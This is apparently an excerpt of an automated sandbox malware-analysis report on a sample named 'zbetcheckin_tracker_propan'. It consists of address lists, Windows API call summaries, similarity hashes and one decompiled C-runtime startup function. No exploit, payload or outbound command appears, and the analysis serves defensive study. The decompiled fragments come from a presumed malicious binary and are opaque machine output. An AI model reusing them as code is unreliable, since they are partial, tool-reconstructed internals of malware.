0x00413097
0x0041309a
0x004130ba
0x004130c9
0x004130cf
0x004130d1
0x004130d3
0x004130d5
0x004130d6
0x004130db
0x004130dc
0x00000000
0x004130dc
0x004130ae
0x004130b3
0x004130b5
0x00000000
0x00000000
0x004130b7
0x00000000
0x00413093
0x00413093
0x00413093
0x004130de
0x004130e1
0x004130e2
0x004130e3
0x004130ef
0x004130ef
0x00413091
0x00412f9a
0x00412f9c
0x00000000
0x00000000
0x00412fa2
0x00412fa5
0x00000000
0x00000000
0x00412fab
0x00412fae
0x00412fb1
0x00412fb8
0x00412fb8
0x00412fde
0x00412fe0
0x00412fe2
0x00000000
0x00412fe8
0x00412fe8
0x00413026
0x00413028
0x00000000
0x00000000
0x00413031
0x00413046
0x0041304a
0x0041305a
0x0041305a
0x0041305e
0x00413063
0x00000000
0x00412ff2
0x00412ff2
0x00412ff2
0x00412ffb
0x00413011
0x00413016
0x00413019
0x00413024
0x00413024
0x00000000
0x00413024
0x0041301b
0x00413021
0x00413021
0x00000000
0x00413021
0x00412ffd
0x00413002
0x00413006
0x00000000
0x00000000
0x00413008
0x00000000
0x00413008
0x00412fe8
0x00412fe2
0x00412f6d
0x00412f77
0x00412f7d
0x00412f80
0x00412f8c
0x00412f82
0x00412f84
0x00412f85
0x00412f85
0x00000000
0x00412f80
0x00412f6f
0x00000000

APIs

GetStringTypeW.KERNEL32(00000001,00418118,00000001,?,00415F7E,00415F7C,00000000,?,?,?,0041311E,00000001,?,00000000,?,?), ref: 00412F65
GetLastError.KERNEL32(?,0041311E,00000001,?,00000000,?,?,?,?,00000000,?,00000001,00000000,00000000,00000008,00000000), ref: 00412F77
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00415F7E,00415F7C,00000000,?,?,?,0041311E,00000001,?,00000000), ref: 00412FDC

Part of subcall function 0040C70A: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001), ref: 0040C782

MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,00000000,?,00000001,00000000,00000000,00000008,00000000,00000000), ref: 00413046
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00413054

Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(7FFFFFFF,00001004,00000000,00000006,00000000,7FFFFFFF,00000000,?,?,?,00410C10,01D31728,?,?), ref: 004134D2

GetStringTypeA.KERNEL32 ref: 004130C9

Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93

Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,0041311E,00000001,?,00000000,?,?,?), ref: 00413540
Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000001,?,0041311E,00000001,?), ref: 00413559
Part of subcall function 004134F7: _strlen.LIBCMT ref: 00413577
Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,00000000,00000000,?,0041311E,00000001,?,00000000,?,?,?,?,00000000), ref: 004135B7
Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,?,00000000,?,?,?,?,?,?,?,0041311E,00000001,?), ref: 00413606
Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413621
Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413647
Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 0041366C

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ByteCharMultiWide$InfoStringType$ErrorExceptionFilterHeapLastProcessUnhandled$AllocCurrentDebuggerFreeLocalePresentTerminate_strlen
String ID:
API String ID: 3073855544-0
Opcode ID: 1668361eef3b64353d9da953a71926155548265248b80579629886da2d2c0dd3
Instruction ID: d46c18d8d68949bb4ae9f948932a194cea07ec9ef34beebbf33d215d183c743c
Opcode Fuzzy Hash: 1668361eef3b64353d9da953a71926155548265248b80579629886da2d2c0dd3
Instruction Fuzzy Hash: 70517C7150010AAFCF209F64DC819EF7FE9EB08355B20443AF905D6250D779DEE19BA8

Function 0040ED95, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 156file

APIs

GetModuleFileNameA.KERNEL32(00000000,00436231,00000104), ref: 0040EE2E

Part of subcall function 00412282: LoadLibraryA.KERNEL32(004181B8), ref: 004122AF

GetStdHandle.KERNEL32(000000F4), ref: 0040EEFE
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040EF29

Strings

,eC, xrefs: 0040EE78
1bC, xrefs: 0040EE1F

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: File$HandleLibraryLoadModuleNameWrite
String ID: ,eC$1bC
API String ID: 1792087469-1627168295
Opcode ID: fd434b84b08807869fccc5c1bf5ab6d9c2846566e93ed371bfdf31bc91bd7674
Instruction ID: 462586cc789323171f2c72c096ec468ac0dd215f58db3d8e5dcc44e6501676fe
Opcode Fuzzy Hash: fd434b84b08807869fccc5c1bf5ab6d9c2846566e93ed371bfdf31bc91bd7674
Instruction Fuzzy Hash: 253137B26442197AE62033279C86BBF364C9B15358F15053BFC08B02D3EA7E996140EE

Function 002D16D8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135string

APIs

StrChrA.SHLWAPI(?,0000005F), ref: 002D170D
memcpy.NTDLL(?,?,?), ref: 002D1724
lstrcpy.KERNEL32(?), ref: 002D173B

Part of subcall function 002D43CF: lstrlen.KERNEL32(?,00000000,?,00000000,002D1C4F,?,00000000,?,00000000,?,?,002D1DB8), ref: 002D43D8
Part of subcall function 002D43CF: mbstowcs.NTDLL ref: 002D43FF
Part of subcall function 002D43CF: memset.NTDLL ref: 002D4411

Part of subcall function 002D26CC: SafeArrayCreate.OLEAUT32(00000011,00000001,002DCA98), ref: 002D26F4
Part of subcall function 002D26CC: memcpy.NTDLL(?,002D1C97,00000008), ref: 002D270E
Part of subcall function 002D26CC: SafeArrayDestroy.OLEAUT32(002D1DB8), ref: 002D273A

Part of subcall function 002D1660: lstrlen.KERNEL32(002DB2EC,?,?,?,002D1802,?,?,80000003,?,?,002DC7CF,80000003,00000000), ref: 002D168D

lstrcpy.KERNEL32(?,002DC6C2), ref: 002D180F

Part of subcall function 002D2668: SysAllocString.OLEAUT32(?), ref: 002D2682
Part of subcall function 002D2668: SysFreeString.OLEAUT32(00000000), ref: 002D26B9

Part of subcall function 002D258A: memcpy.NTDLL(00000000,?,?,?,?,80000003,?,002DC284,?,002DC0DC,?,80000003,?,00000000), ref: 002D25F0
Part of subcall function 002D258A: SafeArrayDestroy.OLEAUT32(?), ref: 002D260A

Part of subcall function 002D1015: HeapFree.KERNEL32(00000000,?,002D46C4), ref: 002D1021

Strings

\, xrefs: 002D1748

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ArraySafememcpy$DestroyFreeStringlstrcpylstrlen$AllocCreateHeapmbstowcsmemset
String ID: \
API String ID: 1868127046-2967466578
Opcode ID: 0471f6dcec23b59a9582d22a67871e39bfe0c1744980941cfb9bc7049ae83c2f
Instruction ID: 8788443c3f8e8becd2cb33870c7bf33ffe475d2dfd16a7a1247ac17320b773ad
Opcode Fuzzy Hash: 0471f6dcec23b59a9582d22a67871e39bfe0c1744980941cfb9bc7049ae83c2f
Instruction Fuzzy Hash: E2419F72124346AFEB11EF61DC45E1BBBE8BF94341F00092AF59492661D730DD78AF62

Function 002D4A14, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61memorystring

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,002D4BE1,00000000,?,?,002D4EAA,00000001,002DB2D4), ref: 002D4A1F
RtlAllocateHeap.NTDLL(00000000,?), ref: 002D4A37
memcpy.NTDLL(00000000,002DB2D4,-00000008,?,?,?,002D4BE1,00000000,?,?,002D4EAA,00000001,002DB2D4), ref: 002D4A7B
memcpy.NTDLL(00000001,002DB2D4,00000001,002D4EAA,00000001,002DB2D4), ref: 002D4A9C

Strings

Fv, xrefs: 002D4A37

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID: Fv
API String ID: 1819133394-1370784869
Opcode ID: d382686c2ae7b182508c3817d5d3fab4c6de9480125178897fd2171e342c5480
Instruction ID: c5a2fff97d5266f316acd6752a6968d7f47a7639629f1f69da8ad82fddf388a0
Opcode Fuzzy Hash: d382686c2ae7b182508c3817d5d3fab4c6de9480125178897fd2171e342c5480
Instruction Fuzzy Hash: 4E110672A10116AFD7109F69EC89E9EBBADEB80360B154177F80897250EA709E1487A0

Function 00410859, Relevance: 7.8, APIs: 5, Instructions: 341

APIs

CompareStringW.KERNEL32(00000000,00000000,00418118,00000001,00418118,00000001), ref: 00410890
GetLastError.KERNEL32 ref: 004108A6
GetCPInfo.KERNEL32(?,?), ref: 00410973
CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 00410AFA

Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,?), ref: 004134D2

CompareStringA.KERNEL32(?,?,?,000000FF,?,?), ref: 00410BB4

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93

Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000), ref: 00413621

Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B1D
Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(004181C4), ref: 00412B28
Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: CompareString$ErrorExceptionFilterInfoLastProcessUnhandled$ByteCharCurrentDebuggerFreeHeapLocaleMultiPresentTerminateWide
String ID:
API String ID: 1477149893-0
Opcode ID: 314d2e48f7f087af81bde016cf6e2330cc518261f67ab945c7a75e3da5c7bf92
Instruction ID: 7711d9c21cebea5d5858b18d19238fb1847bf70f07deecd0d53e6b420bb80e20
Opcode Fuzzy Hash: 314d2e48f7f087af81bde016cf6e2330cc518261f67ab945c7a75e3da5c7bf92
Instruction Fuzzy Hash: DEB1E571A042099FEF219FA4CC51BEF7BB5EF44354F24412BF811A6291D7B898D1CB98

Function 00412B53, Relevance: 7.8, APIs: 5, Instructions: 339

APIs

LCMapStringW.KERNEL32(00000000,00000100,00418118,00000001,00000000,00000000,00000100,?,00000000,00412F26,?,?,?,?,?,?), ref: 00412B83
GetLastError.KERNEL32 ref: 00412B95
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00412D46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00412D69

Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,?), ref: 004134D2

LCMapStringA.KERNEL32(?,?,?,00412F26,00000000,?,00000100,?,00000000,00412F26,?,?,?,?,?,?), ref: 00412EB8

Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B1D
Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(004181C4), ref: 00412B28
Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93

Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000), ref: 00413621

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: String$ByteCharErrorExceptionFilterLastMultiProcessUnhandledWide$CurrentDebuggerFreeHeapInfoLocalePresentTerminate
String ID:
API String ID: 1670007227-0
Opcode ID: 6069162c02378e2361d982123326a565ed05b882d1485d9949e7bd7758d57ae5
Instruction ID: add9e604773e98e0779d4ea288a642ae63b3a42f9b82ecacdf1b385bd7247509
Opcode Fuzzy Hash: 6069162c02378e2361d982123326a565ed05b882d1485d9949e7bd7758d57ae5
Instruction Fuzzy Hash: 77B17D7290010AAFCF219F94DE808EF7BB5FB08354B14452BF905E2260D7798DA1DBA9

Function 0040F5C8, Relevance: 7.7, APIs: 5, Instructions: 186

APIs

GetStartupInfoA.KERNEL32(?), ref: 0040F5DD

Part of subcall function 004110D9: Sleep.KERNEL32(00000000), ref: 004110FE

GetFileType.KERNEL32(00000028), ref: 0040F6F3
GetStdHandle.KERNEL32(-000000F6), ref: 0040F77D
GetFileType.KERNEL32(00000000), ref: 0040F78F

Part of subcall function 00411650: GetModuleHandleA.KERNELBASE(00418144), ref: 00411699
Part of subcall function 00411650: GetProcAddress.KERNELBASE(00000000,0041811C), ref: 004116A9

SetHandleCount.KERNEL32 ref: 0040F7E7

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Handle$FileType$AddressCountInfoModuleProcSleepStartup
String ID:
API String ID: 3773779220-0
Opcode ID: f54464cf799bca3e3ff0fd6964fde78cc66049f9b524298c330f57b1c1d656b0
Instruction ID: 9832171e80a5ad363fa20e46c0fd29f7966222acd706654d32d6996e2c1b38b7
Opcode Fuzzy Hash: f54464cf799bca3e3ff0fd6964fde78cc66049f9b524298c330f57b1c1d656b0
Instruction Fuzzy Hash: 396105715047418ECB308B38DD44B56BBA0AB06324F29877BD462BBBE1D778D84A971A

Function 0040F5C8, Relevance: 7.7, APIs: 5, Instructions: 186

C-Code - Quality: 83%

			E0040F5C8(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t61;
				void* _t64;
				long _t68;
				signed int _t71;
				signed int _t72;
				int* _t74;
				signed int* _t77;
				signed char _t79;
				long _t86;
				signed int _t88;
				int* _t89;
				signed int _t92;
				signed int _t93;
				void* _t98;
				signed int** _t101;
				signed int _t102;
				void* _t106;
				int _t107;
				int _t109;
				void** _t112;
				signed int _t114;
				void** _t118;
				void* _t119;
				void* _t126;

				_t102 = __edx;
				_push(0x54);
				_push(0x418c98);
				E0040D48C(__ebx, __edi, __esi);
				 *(_t119 - 4) = 0;
				GetStartupInfoA(_t119 - 0x64);
				 *(_t119 - 4) = 0xfffffffe;
				_push(0x28);
				_t109 = 0x20;
				_push(_t109);
				_t61 = E004110D9();
				if(_t61 == 0) {
					L45:
					_t62 = _t61 | 0xffffffff;
					__eflags = _t61 | 0xffffffff;
					L46:
					return E0040D4D1(_t62);
				}
				 *0x436ae0 = _t61;
				 *0x436ad4 = _t109;
				_t4 = _t61 + 0x500; // 0x500
				_t92 = _t4;
				while(_t61 < _t92) {
					 *((char*)(_t61 + 4)) = 0;
					 *_t61 =  *_t61 | 0xffffffff;
					 *((char*)(_t61 + 5)) = 0xa;
					 *((intOrPtr*)(_t61 + 8)) = 0;
					 *((char*)(_t61 + 0x24)) = 0;
					 *((char*)(_t61 + 0x25)) = 0xa;
					 *((char*)(_t61 + 0x26)) = 0xa;
					_t61 = _t61 + 0x28;
					_t93 =  *0x436ae0; // 0x1d309f0
					_t92 = _t93 + 0x500;
					__eflags = _t92;
				}
				if( *((intOrPtr*)(_t119 - 0x32)) == 0) {
					L26:
					_t88 = 0;
					do {
						_t112 = _t88 * 0x28 +  *0x436ae0;
						_t64 =  *_t112;
						if(_t64 == 0xffffffff || _t64 == 0xfffffffe) {
							_t112[1] = 0x81;
							__eflags = _t88;
							if(_t88 != 0) {
								asm("sbb eax, eax");
								_t68 =  ~(_t88 - 1) + 0xfffffff5;
								__eflags = _t68;
							} else {
								_t68 = 0xfffffff6;
							}
							_t106 = GetStdHandle(_t68);
							__eflags = _t106 - 0xffffffff;
							if(_t106 == 0xffffffff) {
								L42:
								_t57 =  &(_t112[1]);
								 *_t57 = _t112[1] | 0x00000040;
								__eflags =  *_t57;
								 *_t112 = 0xfffffffe;
								goto L43;
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									goto L42;
								}
								_t71 = GetFileType(_t106);
								__eflags = _t71;
								if(_t71 == 0) {
									goto L42;
								}
								 *_t112 = _t106;
								_t72 = _t71 & 0x000000ff;
								__eflags = _t72 - 2;
								if(__eflags != 0) {
									__eflags = _t72 - 3;
									if(__eflags == 0) {
										_t52 =  &(_t112[1]);
										 *_t52 = _t112[1] | 0x00000008;
										__eflags =  *_t52;
									}
								} else {
									_t112[1] = _t112[1] | 0x00000040;
								}
								_push(0xfa0);
								_t54 =  &(_t112[3]); // -4418260
								_t61 = E00411650(_t88, _t102, _t106, _t112, __eflags);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L45;
								} else {
									_t112[2] = _t112[2] + 1;
									goto L43;
								}
							}
						} else {
							_t112[1] = _t112[1] | 0x00000080;
						}
						L43:
						_t88 = _t88 + 1;
					} while (_t88 < 3);
					SetHandleCount( *0x436ad4);
					_t62 = 0;
					goto L46;
				}
				_t74 =  *(_t119 - 0x30);
				if(_t74 == 0) {
					goto L26;
				}
				_t107 =  *_t74;
				_t89 =  &(_t74[1]);
				 *(_t119 - 0x1c) = _t89 + _t107;
				if(_t107 >= 0x800) {
					_t107 = 0x800;
				}
				_t114 = 1;
				while(1) {
					_t126 =  *0x436ad4 - _t107; // 0x20
					if(_t126 >= 0) {
						break;
					}
					_t77 = E004110D9(0x20, 0x28);
					__eflags = _t77;
					if(__eflags == 0) {
						_t107 =  *0x436ad4; // 0x20
						L17:
						 *(_t119 - 0x20) =  *(_t119 - 0x20) & 0x00000000;
						if(_t107 <= 0) {
							goto L26;
						} else {
							goto L18;
						}
						do {
							L18:
							_t98 =  *( *(_t119 - 0x1c));
							if(_t98 != 0xffffffff && _t98 != 0xfffffffe) {
								_t79 =  *_t89;
								if((_t79 & 0x00000001) == 0) {
									goto L25;
								}
								if((_t79 & 0x00000008) != 0) {
									L23:
									_t118 = ( *(_t119 - 0x20) & 0x0000001f) * 0x28 + 0x436ae0[ *(_t119 - 0x20) >> 5];
									 *_t118 =  *( *(_t119 - 0x1c));
									_t118[1] =  *_t89;
									_push(0xfa0);
									_t39 =  &(_t118[3]); // 0xc
									_t61 = E00411650(_t89, _t102, _t107, _t118, _t132);
									if(_t61 == 0) {
										goto L45;
									}
									_t118[2] = _t118[2] + 1;
									goto L25;
								}
								_t86 = GetFileType(_t98);
								_t132 = _t86;
								if(_t86 == 0) {
									goto L25;
								}
								goto L23;
							}
							L25:
							 *(_t119 - 0x20) =  *(_t119 - 0x20) + 1;
							_t89 =  &(_t89[0]);
							 *(_t119 - 0x1c) =  &(( *(_t119 - 0x1c))[1]);
						} while ( *(_t119 - 0x20) < _t107);
						goto L26;
					}
					_t101 =  &(0x436ae0[_t114]);
					 *_t101 = _t77;
					 *0x436ad4 =  *0x436ad4 + 0x20;
					_t18 =  &(_t77[0x140]); // 0x500
					_t102 = _t18;
					while(1) {
						__eflags = _t77 - _t102;
						if(_t77 >= _t102) {
							break;
						}
						_t77[1] = 0;
						 *_t77 =  *_t77 | 0xffffffff;
						_t77[1] = 0xa;
						_t77[2] = _t77[2] & 0x00000000;
						_t77[9] = _t77[9] & 0x00000080;
						_t77[9] = 0xa;
						_t77[9] = 0xa;
						_t77 =  &(_t77[0xa]);
						_t102 =  &(( *_t101)[0x140]);
						__eflags = _t102;
					}
					_t114 = _t114 + 1;
					__eflags = _t114;
				}
				goto L17;
			}

0x0040f5c8
0x0040f5c8
0x0040f5ca
0x0040f5cf
0x0040f5d6
0x0040f5dd
0x0040f5e3
0x0040f5ea
0x0040f5ee
0x0040f5ef
0x0040f5f0
0x0040f5f9
0x0040f7ff
0x0040f7ff
0x0040f7ff
0x0040f802
0x0040f807
0x0040f807
0x0040f5ff
0x0040f604
0x0040f60a
0x0040f60a
0x0040f63b
0x0040f612
0x0040f616
0x0040f619
0x0040f61d
0x0040f620
0x0040f624
0x0040f628
0x0040f62c
0x0040f62f
0x0040f635
0x0040f635
0x0040f635
0x0040f643
0x0040f746
0x0040f746
0x0040f748
0x0040f74d
0x0040f753
0x0040f758
0x0040f765
0x0040f769
0x0040f76b
0x0040f777
0x0040f779
0x0040f779
0x0040f76d
0x0040f76f
0x0040f76f
0x0040f783
0x0040f785
0x0040f788
0x0040f7cd
0x0040f7cd
0x0040f7cd
0x0040f7cd
0x0040f7d1
0x00000000
0x0040f78a
0x0040f78a
0x0040f78c
0x00000000
0x00000000
0x0040f78f
0x0040f795
0x0040f797
0x00000000
0x00000000
0x0040f799
0x0040f79b
0x0040f7a0
0x0040f7a3
0x0040f7ab
0x0040f7ae
0x0040f7b0
0x0040f7b0
0x0040f7b0
0x0040f7b0
0x0040f7a5
0x0040f7a5
0x0040f7a5
0x0040f7b4
0x0040f7b9
0x0040f7bd
0x0040f7c4
0x0040f7c6
0x00000000
0x0040f7c8
0x0040f7c8
0x00000000
0x0040f7c8
0x0040f7c6
0x0040f75f
0x0040f75f
0x0040f75f
0x0040f7d7
0x0040f7d7
0x0040f7d8
0x0040f7e7
0x0040f7ed
0x00000000
0x0040f7ed
0x0040f649
0x0040f64e
0x00000000
0x00000000
0x0040f654
0x0040f656
0x0040f65c
0x0040f666
0x0040f668
0x0040f668
0x0040f66c
0x0040f6c1
0x0040f6c1
0x0040f6c7
0x00000000
0x00000000
0x0040f673
0x0040f67a
0x0040f67c
0x0040f6cb
0x0040f6d1
0x0040f6d1
0x0040f6d7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f6d9
0x0040f6d9
0x0040f6dc
0x0040f6e1
0x0040f6e8
0x0040f6ec
0x00000000
0x00000000
0x0040f6f0
0x0040f6fd
0x0040f70b
0x0040f717
0x0040f71b
0x0040f71e
0x0040f723
0x0040f727
0x0040f730
0x00000000
0x00000000
0x0040f736
0x00000000
0x0040f736
0x0040f6f3
0x0040f6f9
0x0040f6fb
0x00000000
0x00000000
0x00000000
0x0040f6fb
0x0040f739
0x0040f739
0x0040f73c
0x0040f73d
0x0040f741
0x00000000
0x0040f6d9
0x0040f67e
0x0040f685
0x0040f687
0x0040f68e
0x0040f68e
0x0040f6bc
0x0040f6bc
0x0040f6be
0x00000000
0x00000000
0x0040f696
0x0040f69a
0x0040f69d
0x0040f6a1
0x0040f6a5
0x0040f6a9
0x0040f6ad
0x0040f6b1
0x0040f6b6
0x0040f6b6
0x0040f6b6
0x0040f6c0
0x0040f6c0
0x0040f6c0
0x00000000

APIs

GetStartupInfoA.KERNEL32 ref: 0040F5DD

Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE

GetFileType.KERNEL32(00000028), ref: 0040F6F3
GetStdHandle.KERNEL32(-000000F6), ref: 0040F77D
GetFileType.KERNEL32(00000000), ref: 0040F78F

Part of subcall function 00411650: GetModuleHandleA.KERNELBASE(kernel32.dll,00000014,0040D3F9,00000000,00000FA0,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 00411699
Part of subcall function 00411650: GetProcAddress.KERNELBASE(00000000,InitializeCriticalSectionAndSpinCount,?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000), ref: 004116A9

SetHandleCount.KERNEL32 ref: 0040F7E7

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Handle$FileType$AddressCountInfoModuleProcSleepStartup
String ID:
API String ID: 3773779220-0
Opcode ID: 177b95c54f012ced1cbbbfd99870b4da6430cddf8e0b3fa422239073d3d5df6b
Instruction ID: 9832171e80a5ad363fa20e46c0fd29f7966222acd706654d32d6996e2c1b38b7
Opcode Fuzzy Hash: 177b95c54f012ced1cbbbfd99870b4da6430cddf8e0b3fa422239073d3d5df6b
Instruction Fuzzy Hash: 396105715047418ECB308B38DD44B56BBA0AB06324F29877BD462BBBE1D778D84A971A

Function 0040F493, Relevance: 7.6, APIs: 5, Instructions: 132

APIs

GetLastError.KERNEL32 ref: 0040F4C3

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040F55F
GetEnvironmentStrings.KERNEL32 ref: 0040F571

Part of subcall function 00411099: Sleep.KERNEL32(00000000), ref: 004110B6

FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040F5A2
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040F5B9

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: EnvironmentFreeStrings$ErrorLast$HeapSleep
String ID:
API String ID: 2723279459-0
Opcode ID: 66e5e16bbc2dae928d6d27937c6462e8127e4b768cd69cb8ae85eedee65fc7fc
Instruction ID: 6bf94f53e6792b39615ea347a74f884125bffed823015082882c4e2888071e4e
Opcode Fuzzy Hash: 66e5e16bbc2dae928d6d27937c6462e8127e4b768cd69cb8ae85eedee65fc7fc
Instruction Fuzzy Hash: 803116B25042257FC7303F745C8483B7AECEB58354725093BFA45E3B82E6395C8D86A9

Function 002DE621, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 105memorystring

APIs

lstrcpyn.KERNEL32(?,004040F4,00000008), ref: 002DE64F
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 002DE6C2
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000001), ref: 002DE724

Strings

Sep 26 2018, xrefs: 002DE6A1
pnls, xrefs: 002DE6F8

Memory Dump Source

Source File: 00000001.00000002.3011396965.00000000002DE000.00000040.sdmp, Offset: 002DE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2de000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Virtual$AllocFreelstrcpyn
String ID: Sep 26 2018$pnls
API String ID: 2525242972-743851359
Opcode ID: 4c9f1391c27781ae0e8a1fdc3f2a701da6ce61fa81748751bd6d1aad50f98a9c
Instruction ID: e8dd02b51cd0e676c304544d8130cbdc5c4daf04c04c18ff8e5a331340c2de1b
